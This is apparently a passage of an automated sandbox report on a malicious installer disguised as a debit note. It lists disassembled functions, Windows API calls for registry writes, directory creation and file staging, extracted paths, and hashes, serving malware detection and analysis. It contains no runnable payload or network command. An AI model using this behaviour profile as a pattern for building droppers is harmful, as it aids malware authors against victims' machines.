                                  • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                  • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                • String ID: C:\Users\user\AppData\Local\Temp\nsb5059.tmp$C:\Users\user\AppData\Local\Temp\nsb5059.tmp\System.dll$C:\Users\user\brugerlicensaftalerne\Isidora$Call
                                • API String ID: 1941528284-2145328627
                                • Opcode ID: 8fd7ff773941625183321c21c1d438156bd1c93f7609a995d7972b8441070f6c
                                • Instruction ID: 22a22a0f5d261001ccd7191b61e6a6ae22ba545f5f0eb33ed6189b5534195358
                                • Opcode Fuzzy Hash: 8fd7ff773941625183321c21c1d438156bd1c93f7609a995d7972b8441070f6c
                                • Instruction Fuzzy Hash: 3341C071900515BACF11BBB5CC86EAF3679EF06369F20423BF422B10E1C73C8A419A6D

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 610 402573-402588 call 402b1d 613 4029c7-4029ca 610->613 614 40258e-402595 610->614 615 4029d0-4029d6 613->615 616 402597 614->616 617 40259a-40259d 614->617 616->617 619 4025a3-4025b2 call 405ea8 617->619 620 4026e6-4026ee 617->620 619->620 623 4025b8 619->623 620->613 624 4025be-4025c2 623->624 625 402657-402667 call 405c37 624->625 626 4025c8-4025e3 ReadFile 624->626 625->620 633 402669 625->633 626->620 627 4025e9-4025ee 626->627 627->620 629 4025f4-402602 627->629 631 4026a2-4026ae call 405e8f 629->631 632 402608-40261a MultiByteToWideChar 629->632 631->615 632->633 635 40261c-40261f 632->635 636 40266c-40266f 633->636 638 402621-40262c 635->638 636->631 639 402671-402676 636->639 638->636 640 40262e-402653 SetFilePointer MultiByteToWideChar 638->640 641 4026b3-4026b7 639->641 642 402678-40267d 639->642 640->638 645 402655 640->645 643 4026d4-4026e0 SetFilePointer 641->643 644 4026b9-4026bd 641->644 642->641 646 40267f-402692 642->646 643->620 648 4026c5-4026d2 644->648 649 4026bf-4026c3 644->649 645->633 646->620 647 402694-40269a 646->647 647->624 650 4026a0 647->650 648->620 649->643 649->648 650->620
                                APIs
                                • ReadFile.KERNELBASE(?,?,?,?), ref: 004025DB
                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
                                • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F
                                  • Part of subcall function 00405C37: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B
                                  • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                • String ID: 9
                                • API String ID: 1149667376-2366072709
                                • Opcode ID: 14d7a1a443259207830479a75009ee39c6dacd7ae2e8022bb32dc9fb2f0741b6
                                • Instruction ID: 34008a6f5bb5370994306dbe4266d00811a1d2e87b5126a94146f67fdcf6739f
                                • Opcode Fuzzy Hash: 14d7a1a443259207830479a75009ee39c6dacd7ae2e8022bb32dc9fb2f0741b6
                                • Instruction Fuzzy Hash: 0E51E771E04209ABDF24DF94DE88AAEB779FF04304F50443BE511B62D0D7B99A42CB69

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 651 4051f2-405207 652 40520d-40521e 651->652 653 4052be-4052c2 651->653 654 405220-405224 call 405f6a 652->654 655 405229-405235 lstrlenW 652->655 654->655 657 405252-405256 655->657 658 405237-405247 lstrlenW 655->658 660 405265-405269 657->660 661 405258-40525f SetWindowTextW 657->661 658->653 659 405249-40524d lstrcatW 658->659 659->657 662 40526b-4052ad SendMessageW * 3 660->662 663 4052af-4052b1 660->663 661->660 662->663 663->653 664 4052b3-4052b6 663->664 664->653
                                APIs
                                • lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                • lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                • lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                • SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                • String ID:
                                • API String ID: 2531174081-0
                                • Opcode ID: 241caa620ce1fcc58b3a3595d79cd8debb0f013b3e7c164dabd01d0a25878295
                                • Instruction ID: 09d17c59ce7287a2cbf3dc662f19c44123261f726eb293d34c68041fb2ac0666
                                • Opcode Fuzzy Hash: 241caa620ce1fcc58b3a3595d79cd8debb0f013b3e7c164dabd01d0a25878295
                                • Instruction Fuzzy Hash: CA21A131900558BBCB219FA5DD849DFBFB8EF54310F14807AF904B62A0C3798A81CFA8

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 665 402331-402377 call 402c2f call 402b3a * 2 RegCreateKeyExW 672 4029c7-4029d6 665->672 673 40237d-402385 665->673 675 402387-402394 call 402b3a lstrlenW 673->675 676 402398-40239b 673->676 675->676 679 4023ab-4023ae 676->679 680 40239d-4023aa call 402b1d 676->680 681 4023b0-4023ba call 403062 679->681 682 4023bf-4023d3 RegSetValueExW 679->682 680->679 681->682 687 4023d5 682->687 688 4023d8-4024b2 RegCloseKey 682->688 687->688 688->672 690 402793-40279a 688->690 690->672
                                APIs
                                • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb5059.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsb5059.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsb5059.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: CloseCreateValuelstrlen
                                • String ID: C:\Users\user\AppData\Local\Temp\nsb5059.tmp
                                • API String ID: 1356686001-2510104927
                                • Opcode ID: 8805ef30542b3f47b4a39dd0cadf8e155504b39143e93a45ad012f161cb1779c
                                • Instruction ID: 1c964708cf89b7fac74d07524040b6b2ab84de1cfba919da144199f52892a02b
                                • Opcode Fuzzy Hash: 8805ef30542b3f47b4a39dd0cadf8e155504b39143e93a45ad012f161cb1779c
                                • Instruction Fuzzy Hash: A51190B1A00108BEEB11EFA4CD89EAFBB7CEB50358F10443AF505B61D1D7B85E409B29

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 691 4015b9-4015cd call 402b3a call 405a3e 696 401614-401617 691->696 697 4015cf-4015eb call 4059c0 CreateDirectoryW 691->697 699 401646-402197 call 401423 696->699 700 401619-401638 call 401423 call 405f48 SetCurrentDirectoryW 696->700 704 40160a-401612 697->704 705 4015ed-4015f8 GetLastError 697->705 712 402793-40279a 699->712 713 4029c7-4029d6 699->713 700->713 716 40163e-401641 700->716 704->696 704->697 708 401607 705->708 709 4015fa-401605 GetFileAttributesW 705->709 708->704 709->704 709->708 712->713 716->713
                                APIs
                                  • Part of subcall function 00405A3E: CharNextW.USER32(?,?,Antegrade\Fravristelse213.Sto226,?,00405AB2,Antegrade\Fravristelse213.Sto226,Antegrade\Fravristelse213.Sto226,?,?,77222EE0,004057F0,?,C:\Users\user\AppData\Local\Temp\,77222EE0,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"), ref: 00405A4C
                                  • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A51
                                  • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A69
                                • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\brugerlicensaftalerne\Isidora,?,00000000,000000F0), ref: 00401630
                                Strings
                                • C:\Users\user\brugerlicensaftalerne\Isidora, xrefs: 00401623
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                • String ID: C:\Users\user\brugerlicensaftalerne\Isidora
                                • API String ID: 3751793516-431281164
                                • Opcode ID: 563658752a320469cbbf05847d38c43e8d4ffc81c57abf02e21dc30b2d994902
                                • Instruction ID: 602e027c19ef8137931421d3e2870900c2c1aa36f58208ee64056e3add0ea48c
                                • Opcode Fuzzy Hash: 563658752a320469cbbf05847d38c43e8d4ffc81c57abf02e21dc30b2d994902
                                • Instruction Fuzzy Hash: 4F11C271904200EBCF206FA0CD449AE7AB4FF14369B34463BF881B62E1D23D49419A6E

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 718 402b7a-402ba3 RegOpenKeyExW 719 402ba5-402bb0 718->719 720 402c0e-402c12 718->720 721 402bcb-402bdb RegEnumKeyW 719->721 722 402bb2-402bb5 721->722 723 402bdd-402bef RegCloseKey call 4062b2 721->723 724 402c02-402c05 RegCloseKey 722->724 725 402bb7-402bc9 call 402b7a 722->725 731 402bf1-402c00 723->731 732 402c15-402c1b 723->732 729 402c0b-402c0d 724->729 725->721 725->723 729->720 731->720 732->729 733 402c1d-402c2b RegDeleteKeyW 732->733 733->729 734 402c2d 733->734 734->720
                                APIs
                                • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402B9B
                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: Close$DeleteEnumOpen
                                • String ID:
                                • API String ID: 1912718029-0
                                • Opcode ID: b547f4a97addcc1e8c82d95905b84b8973278d2723117ef79469a300e8f1f4e9
                                • Instruction ID: 39c85bfe7ca74ada2351cc0a51ccebcd1f3e21716521df4e7e96f28c7df0de5f
                                • Opcode Fuzzy Hash: b547f4a97addcc1e8c82d95905b84b8973278d2723117ef79469a300e8f1f4e9
                                • Instruction Fuzzy Hash: 5B116A31904008FEEF229F90DE89EAE3B7DFB14348F100476FA01B00A0D3B59E51EA69

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 736 10001759-10001795 call 10001b18 740 100018a6-100018a8 736->740 741 1000179b-1000179f 736->741 742 100017a1-100017a7 call 10002286 741->742 743 100017a8-100017b5 call 100022d0 741->743 742->743 748 100017e5-100017ec 743->748 749 100017b7-100017bc 743->749 750 1000180c-10001810 748->750 751 100017ee-1000180a call 100024a9 call 100015b4 call 10001272 GlobalFree 748->751 752 100017d7-100017da 749->752 753 100017be-100017bf 749->753 757 10001812-1000184c call 100015b4 call 100024a9 750->757 758 1000184e-10001854 call 100024a9 750->758 773 10001855-10001859 751->773 752->748 759 100017dc-100017dd call 10002b5f 752->759 755 100017c1-100017c2 753->755 756 100017c7-100017c8 call 100028a4 753->756 761 100017c4-100017c5 755->761 762 100017cf-100017d5 call 10002645 755->762 768 100017cd 756->768 757->773 758->773 771 100017e2 759->771 761->748 761->756 777 100017e4 762->777 768->771 771->777 778 10001896-1000189d 773->778 779 1000185b-10001869 call 1000246c 773->779 777->748 778->740 784 1000189f-100018a0 GlobalFree 778->784 786 10001881-10001888 779->786 787 1000186b-1000186e 779->787 784->740 786->778 789 1000188a-10001895 call 1000153d 786->789 787->786 788 10001870-10001878 787->788 788->786 790 1000187a-1000187b FreeLibrary 788->790 789->778 790->786
                                APIs
                                  • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                  • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                  • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                • GlobalFree.KERNEL32(00000000), ref: 10001804
                                • FreeLibrary.KERNEL32(?), ref: 1000187B
                                • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                  • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                  • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                  • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.11419527256.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.11419505388.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000000.00000002.11419552183.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000000.00000002.11419574238.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: Global$Free$Alloc$Librarylstrcpy
                                • String ID:
                                • API String ID: 1791698881-3916222277
                                • Opcode ID: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
                                • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                • Opcode Fuzzy Hash: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
                                • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 793 405e15-405e47 RegOpenKeyExW 794 405e89-405e8c 793->794 795 405e49-405e68 RegQueryValueExW 793->795 796 405e76 795->796 797 405e6a-405e6e 795->797 799 405e79-405e83 RegCloseKey 796->799 798 405e70-405e74 797->798 797->799 798->796 798->799 799->794
                                APIs
                                • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E3F
                                • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E60
                                • RegCloseKey.KERNELBASE(?,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E83
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID: Call
                                • API String ID: 3677997916-1824292864
                                • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                • Instruction ID: 600534e839ec184522a2ed62e812a695e1e378dc1a2fe7ff70d8343822b3fb0e
                                • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                • Instruction Fuzzy Hash: A7015A3114020EEACB218F56EC08EEB3BA8EF54390F00413AF944D2220D334DA64CBE5
                                APIs
                                • GetTickCount.KERNEL32 ref: 00405C01
                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403358,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405C1C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: CountFileNameTempTick
                                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                • API String ID: 1716503409-944333549
                                • Opcode ID: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                • Instruction ID: 094b443934c56d738417ad06ce23117a41e39d67b54f0ae1535361756efc6c0b
                                • Opcode Fuzzy Hash: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                • Instruction Fuzzy Hash: 45F09676A04208BBDB009F59DC05E9BB7B8EB91710F10803AEA01E7151E2B0AD448B54
                                APIs
                                • GetTickCount.KERNEL32 ref: 00403192
                                  • Part of subcall function 0040330F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                • WriteFile.KERNELBASE(0040BE90,0040C02F,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                • SetFilePointer.KERNELBASE(00004D6E,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: File$Pointer$CountTickWrite
                                • String ID:
                                • API String ID: 2146148272-0
                                • Opcode ID: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                • Instruction ID: 34320a24581f7621071559271f75aff2a33e70c32c739a51ea230fcf3b1a2f41
                                • Opcode Fuzzy Hash: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                • Instruction Fuzzy Hash: CB418B72504205DFDB109F29EE84AA63BADF74431671441BFE604B22E1C7B96D418BEC
                                APIs
                                  • Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,77223420,00403542), ref: 0040623F
                                  • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                  • Part of subcall function 004061DC: CharNextW.USER32(?,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,77223420,00403542), ref: 00406253
                                  • Part of subcall function 004061DC: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,77223420,00403542), ref: 00406266
                                • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77223420,00403542), ref: 00403347
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
